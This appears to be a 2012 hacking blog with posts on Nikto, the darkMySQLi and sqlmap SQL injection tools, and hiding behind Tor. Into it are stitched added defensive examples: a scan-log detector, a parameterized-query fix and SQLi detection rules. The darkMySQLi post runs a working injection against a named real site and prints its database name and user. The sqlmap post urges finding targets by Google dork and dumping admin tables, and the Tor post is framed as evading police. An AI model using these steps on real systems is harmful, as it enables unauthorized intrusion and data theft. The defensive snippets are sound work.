
Wednesday, 18 April 2012

Penetration testing with Nikto

Reference level: beginner
Tested on: Linux BackTrack 4 R2
Version: v2.1.3

A brief overview of Nikto

Nikto is an open-source (GPL) web scanner that runs comprehensive tests against web servers. Nikto can detect 3500 potentially dangerous files/CGIs. Nikto can test a web server quickly, but its scans are easy to spot in the server logs. Even so, it is very useful for testing a web server.

Command-line options (from the help output):

-config+ Use this config file
-Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
-dbcheck check database and other key files for syntax errors (cannot be abbreviated)
-evasion+ ids evasion technique
-Format+ save file (-o) format
-host+ target host
-Help Extended help information
-id+ host authentication to use, format is userid:password
-list-plugins List all available plugins
-mutate+ Guess additional file names
-mutate-options+ Provide extra information for mutations
-output+ Write output to this file
-nocache Disables the URI cache
-nossl Disables using SSL
-no404 Disables 404 checks
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-root+ Prepend root value to all requests, format is /directory
-Display+ Turn on/off display outputs
-ssl Force ssl mode on port
-Single Single request mode
-timeout+ Timeout (default 2 seconds)
-Tuning+ Scan tuning
-update Update databases and plugins from cirt.net (cannot be abbreviated)
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value

The configuration file is located in the directory /pentest/scanner/nikto and is called config.txt

#########################################################################################################
# CONFIG STUFF
#########################################################################################################
# default command line options, can't be an option that requires a value. used for ALL runs.
# CLIOPTS=-g -a

# location of nmap to use with port scanning (rather than Nikto internals)
# and any options to pass to it
NMAP=/usr/local/bin/nmap
NMAPOPTS=-P0

# ports never to scan
SKIPPORTS=21 111

# IDs never to alert on (Note: this only works for IDs loaded from db_tests)
SKIPIDS=000703

# if Nikto is having difficulty finding the 'plugins', set the full install path here
# EXECDIR=/usr/local/nikto

# the default HTTP version to try... can/will be changed as necessary
DEFAULTHTTPVER=1.0

# Nikto can submit updated version strings to CIRT.net. It won't do this w/o permission. You should
# send updates because it makes the data better for everyone ;) *NO* server specific information
# such as IP or name is sent, just the relevant version information.
# UPDATES=yes #-- ask before each submission if it should send
# UPDATES=no #-- don't ask, don't send
# UPDATES=auto #-- automatically attempt submission *without prompting*
UPDATES=yes

# Warning if MAX_WARN OK or MOVED responses are retrieved
MAX_WARN=20

# Prompt... if set to 'no' you'll never be asked for anything. Good for automation.
#PROMPTS=no

# cirt.net : set the IP so that updates can work without name resolution
CIRT=209.172.49.178

#########################################################################################################
# PROXY STUFF
#########################################################################################################
#PROXYHOST=127.0.0.1
#PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword

#########################################################################################################
# COOKIE STUFF
#########################################################################################################
# send a cookie with all requests, helpful if auth cookie is needed
#STATIC-COOKIE=cookiename=cookievalue

I tested this on my local LAN, which already has a virtual server …
Some basic usage:


Code:
zee-laptop@IBTeam:~$ perl nikto.pl -h 192.168.1.3

To test a specific port, use the -p (port) option. This will scan IP 192.168.1.3 on TCP 443:

perl nikto.pl -h 192.168.1.3 -p 80

Here is the command for testing multiple ports:

perl nikto.pl -h 192.168.1.3 -p 80,88,443

To save the output as a txt log:

bt nikto # ./nikto.pl -e 1 -host hxxp://192.168.1.3/joomla1af -F txt -o monfile.txt

Example output (screenshot):

http://a4.sphotos.ak.fbcdn.net/hphotos-ak-snc6/180930_1568118200021_1147422359_31227298_7799398_n.jpg
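The overview above says a Nikto scan is easy to spot in the server logs. The script below is an added example (not part of the original post or of Nikto) showing what that looks like from the defender's side: it parses Apache/nginx combined-format access log lines and flags a client either because its User-Agent names Nikto (the default agent string of Nikto 2.1.x contains "Nikto/<version>") or because most of its requests hit non-existent paths, which is what a file/CGI check list produces on a server that does not have those files. The log lines, IP addresses, paths and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict

# Combined Log Format:
# IP - - [time] "METHOD PATH HTTP/x" STATUS SIZE "REFERER" "USER-AGENT"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample data. The agent string mirrors the shape of Nikto's default
# User-Agent; the second "scanner" has a renamed agent so only the 404 ratio catches it.
NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.3) (Evasions:None) (Test:000046)"
GENERIC_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"


def _line(ip, path, status, agent, sec):
    return (f'{ip} - - [18/Apr/2012:18:07:{sec:02d} +0700] "GET {path} HTTP/1.0" '
            f'{status} 289 "-" "{agent}"')


SAMPLE_LOG = [
    # 192.168.1.50: default Nikto agent, one real page and five missing files
    _line("192.168.1.50", "/", 200, NIKTO_UA, 0),
    _line("192.168.1.50", "/cgi-bin/test-cgi", 404, NIKTO_UA, 1),
    _line("192.168.1.50", "/admin/", 404, NIKTO_UA, 1),
    _line("192.168.1.50", "/phpmyadmin/", 404, NIKTO_UA, 2),
    _line("192.168.1.50", "/backup.zip", 404, NIKTO_UA, 2),
    _line("192.168.1.50", "/cgi-bin/printenv", 404, NIKTO_UA, 3),
    # 192.168.1.51: agent string changed via USERAGENT in config, but same 404 burst
    _line("192.168.1.51", "/", 200, GENERIC_UA, 10),
    *[_line("192.168.1.51", f"/probe{i}.php", 404, GENERIC_UA, 11 + i) for i in range(7)],
    # 10.0.0.7: an ordinary visitor
    _line("10.0.0.7", "/", 200, GENERIC_UA, 30),
    _line("10.0.0.7", "/news.php?id=720", 200, GENERIC_UA, 31),
    _line("10.0.0.7", "/style.css", 200, GENERIC_UA, 31),
    "this line is not a valid log record",
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines, min_requests=5, max_404_ratio=0.6):
    """Return {ip: [reasons]} for clients whose traffic looks like a Nikto-style scan."""
    stats = defaultdict(lambda: {"agent_hit": False, "requests": 0, "not_found": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["requests"] += 1
        s["not_found"] += int(rec["status"] == "404")
        if "nikto" in rec["agent"].lower():
            s["agent_hit"] = True

    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["agent_hit"]:
            reasons.append("user agent identifies Nikto")
        # A high share of 404s across many requests is the footprint of a check list
        # being walked against paths that do not exist on this server.
        if s["requests"] >= min_requests and s["not_found"] / s["requests"] >= max_404_ratio:
            reasons.append(f"{s['not_found']}/{s['requests']} requests returned 404")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

The agent-string rule is cheap but brittle, because the agent can be changed in config.txt (the USERAGENT setting) or behind a proxy; the 404-ratio rule is what survives that, so both are reported separately and the thresholds are deliberately parameters rather than constants.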

darkMySQLI

This tool may already be old news, but since it ships with BackTrack 5, I figure I should post it here... hmm... so friends who already know this tool, please keep quiet and let the others who don't know it yet learn :P

OK, straight to it then

In BackTrack 5 R1 this tool lives in the directory
Code:
/pentest/web/darkmysqli

OK, let's assume you're already inside that directory...

Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py 
root@zee-eichel{/pentest/web/darkmysqli}:

I happened to come across a vulnerable site, which I'll use as the example here :P

Code:
ttp://www.asf.ca/news.php?id=720'

I've already emailed the admin so it gets patched :P it's only used as a sample...

OK, now let's look at the tool's help options

Code:
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


For the first step we have to find the number of columns in the target site's database query

Syntax:
Code:
python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Code:
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

If the site is vulnerable, the next step, as the tool's final message says ("Don't forget to check darkMySQLi.log"), is to inspect that log, which sits in the same directory as the tool
Code:

root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


Now look at the part I marked in red (the darkMySQLi URL line of the log); for the third step, enter this syntax.

Our actual goal is to list all the columns in the target site's database

Code:
python DarkMySQLi.py -u [URL from the darkMySQLi log]-- --full

Code:

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...darkc0de-- --full

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...IMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

The next step is to look at the log again

Code:

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790



[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Look again at the part I marked in red :P
We've now got the database name, the user and the version... still version 5, wow wow... there are still sites running version 5, tsk tsk

The next step is simply to dump the database, hahaha
you can also do it manually, since you already have everything you need...

Syntax:
Code:
darkMySQLi.py -u "(target with the bug)" --dump -D (database name) -T (table name) -C (column,column)

That's all for now, hope it's useful :P
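The --findcol and --full steps above work only because the site builds its SQL by pasting the `id` query parameter straight into the statement, so the `AND 1=2 UNION SELECT ...` tail from darkMySQLi.log becomes part of the query. The code below is an added example, not from this post or from the darkMySQLi tool, that shows the same `news.php?id=` lookup written the vulnerable way and the parameterized way, using an in-memory SQLite database (a stand-in for the MySQL backend discussed above; the table, rows and the quoted marker string are constructed for the example). It demonstrates why the findcol step succeeds against the first version and returns nothing against the second.

```python
import sqlite3

# Decoded form of the injected value in the darkMySQLi log (each "+" is a space).
# The marker column is quoted here because SQLite has no equivalent of the tool's
# unquoted identifier trick; the shape of the payload is what matters.
INJECTED_ID = "720 AND 1=2 UNION SELECT 1,'darkc0de'--"


def make_db():
    """Constructed news table: one legitimate row for id 720."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(719, "Board elected"), (720, "Spring meeting"), (721, "Results posted")])
    return conn


def lookup_news_vulnerable(conn, raw_id):
    """The pattern the post exploits: the request parameter is spliced into the SQL text."""
    sql = f"SELECT id, title FROM news WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def lookup_news_parameterized(conn, raw_id):
    """Same query, but the value travels as a bound parameter, never as SQL text.
    SQLite's INTEGER column affinity still lets the plain '720' match, while the
    injected string is compared as text and matches no row."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (raw_id,)).fetchall()


def lookup_news_safe(conn, raw_id):
    """Defense in depth: validate the type first, then bind the parameter."""
    try:
        news_id = int(raw_id)
    except (TypeError, ValueError):
        return []  # ?id= must be an integer; anything else is rejected outright
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (news_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal  :", lookup_news_vulnerable(db, "720"))
    print("vulnerable, injected:", lookup_news_vulnerable(db, INJECTED_ID))
    print("bound param, injected:", lookup_news_parameterized(db, INJECTED_ID))
    print("validated, injected  :", lookup_news_safe(db, INJECTED_ID))
```

The first version returns the attacker-controlled row `(1, 'darkc0de')` instead of the article, which is exactly the marker darkMySQLi looks for in the page to decide a column is "null" (printable). The parameterized versions return the article for `720` and an empty result for the injected string, so the tool's column search never finds a marker. Binding parameters is the fix; the integer cast is a cheap extra check that also gives you a clean place to log rejected input.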

Tuesday, 17 April 2012

SQLi with sqlmap.py

OK friends, this time I'll share a tutorial on SQLi using SQLMAP, one of the pentest tools included in BackTrack...

OK, straight to it rather than dragging this out..

The first thing to do is boot your laptop/PC running BackTrack; a virtual machine is fine too...

hihihi :P

OK, seriously now..

1. Open SQLMap by going to

Code:
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2. Find a target whose hole you have already located using a Google dork...

3. Once you have a site with a hole, go ahead and pentest it..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 --dbs
-u = the URL
--dbs = enumerate the database names...

4. Once you've found the database name..
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng --tables
-D = the database name we found earlier
--tables = to list the tables in it..

5. The tables are listed and it turns out there's an admin table, so let's look at its columns...
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng -T Admin --columns

Then dump the table:
Code:
python sqlmap.py -u http://site.com/catalog.php?id=129 -D gatotganteng -T Admin --dump
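Both this post and the darkMySQLi post before it run their enumeration through a single URL parameter, and the darkMySQLi help above mentions two encodings for the same payload (`+` with `--`, or `/**/` with `/*`). The code below is an added example, not from this post or from sqlmap, of the normalisation a defender has to do before matching request URLs against SQL keywords: it decodes the query string (including double percent-encoding), turns `/**/` comments back into whitespace, and only then applies a small rule set. The rule names, the sample URLs other than the one already quoted in the darkMySQLi log, and the thresholds are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Rule set: (name, regex applied to the normalised parameter value)
SQLI_RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-tail", re.compile(r"(--|#|/\*)\s*$")),
]


def normalize(value):
    """Undo the encodings a probe may use so the rules see plain SQL text.

    parse_qsl already did one round of %xx and '+' decoding; a second round
    handles double-encoded payloads. Closed /**/ comments become whitespace,
    which is how MySQL reads them; an unterminated /* is left for comment-tail.
    """
    v = unquote_plus(value)
    v = re.sub(r"/\*.*?\*/", " ", v)
    return re.sub(r"\s+", " ", v).strip()


def classify_request(url):
    """Return [(param_name, rule_name), ...] for every suspicious query parameter."""
    hits = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(raw)
        for rule_name, rx in SQLI_RULES:
            if rx.search(text):
                hits.append((name, rule_name))
    return hits


def scan_paths(paths):
    """Summarise a list of request paths (e.g. the path field of an access log)."""
    return {p: classify_request(p) for p in paths if classify_request(p)}


# Constructed sample requests: the first two are the benign and injected URLs seen
# in the darkMySQLi log above; the rest use the alternative encodings.
SAMPLE_REQUESTS = [
    "http://www.asf.ca/news.php?id=720",
    "http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--",
    "/news.php?id=720/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2/*",
    "/news.php?id=720%2520UNION%2520SELECT%25201%2C2",
    "/catalog.php?id=129&page=2",
]

if __name__ == "__main__":
    for path, found in scan_paths(SAMPLE_REQUESTS).items():
        print(path, "->", found)
```

Matching raw URLs without this normalisation misses the `/**/` form entirely and the double-encoded form unless the web server logs the decoded path, which is why the decoding sits in its own function that can be unit-tested on its own. In production you would feed `classify_request` the path field from the access-log parser and alert on any client accumulating hits, rather than blocking on a single match.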

Once you've got this far, go ahead..

do whatever you want with it, but to be clear, I'm not responsible..

hahaha

don't forget to give cendol (rep) :)

hehe

regards, veronochi

and I only want to share with people who want to learn...

Tuesday, 10 April 2012

Anonymous (undetected) hacking with Tor

Many friends are surely often afraid that while hacking a website their IP gets detected and then the police come for them...
Well, this time I have a small solution... while browsing YouTube I came across a good video tutorial.
Hopefully it gives you
ideas on how to use Tor better.. It's very easy to use ^_^. As you can see, I never connect directly to the target website... good luck ^_^